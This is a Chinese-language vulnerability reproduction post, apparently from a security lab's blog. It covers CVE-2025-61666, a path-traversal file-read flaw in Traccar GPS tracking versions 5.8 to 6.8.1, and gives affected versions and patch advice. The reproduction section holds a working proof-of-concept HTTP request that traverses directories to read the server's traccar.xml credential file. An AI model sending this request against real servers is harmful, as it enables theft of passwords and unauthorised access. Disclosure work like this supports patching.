文章总结： 本文披露了TraccarGPS跟踪系统在5.8至6.8.1版本中存在的文件包含漏洞CVE-2025-61666。该漏洞源于未对文件包含操作进行有效验证，攻击者可利用路径遍历读取服务器上的任意文件，如窃取conf/traccar.xml中的密码等敏感信息。文章提供了漏洞复现的POC请求示例，并指出官方已发布修复补丁，建议用户尽快升级以规避风险。 综合评分： 86 文章分类： 漏洞分析,漏洞POC,WEB安全,漏洞预警

【漏洞复现】Traccar文件包含漏洞(CVE-2025-61666)

稻草人

玄武盾网络技术实验室

2025年12月15日 10:36 江西

*免责声明：本文仅供安全研究与学习之用，严禁使用本内容进行未经授权的违规渗透测试，遵守网络安全法，共同维护网络安全，违者后果自负。

一、产品介绍

      Traccar 是由美国 Traccar 公司开发的 GPS 跟踪建站系统，基于 Java 技术构建，核心提供 GPS 跟踪相关功能。该软件兼容性极强，支持超过 170 种 GPS 通信协议与 1500 余款不同型号的 GPS 跟踪设备，可与各类主流 SQL 数据库系统适配，同时配备了简洁易用的 REST API 接口。经检测，Traccar 6.1-6.8.1 版本及 5.8-6.0 版本存在安全漏洞，漏洞成因是未对文件包含操作进行有效验证，攻击者可能利用该漏洞窃取密码信息或读取任意文件。

二、影响版本

Traccar 6.1版本至6.8.1版本和5.8版本至6.0版本存在安全漏洞

三、复现

1.访问漏洞环境

2.对漏洞进行复现

漏洞脚本

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1Host: 127.0.0.1:8083

通过相应判断漏洞存在

3.yakit插件测试

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.traccar.org/https://projectblack.io/blog/jetty-addpath-lfi/

随手点个「推荐」吧！

声明：技术文章均收集于互联网，仅作为本人学习、记录使用。侵权删！！

查看原文：《【漏洞复现】Traccar文件包含漏洞(CVE-2025-61666)》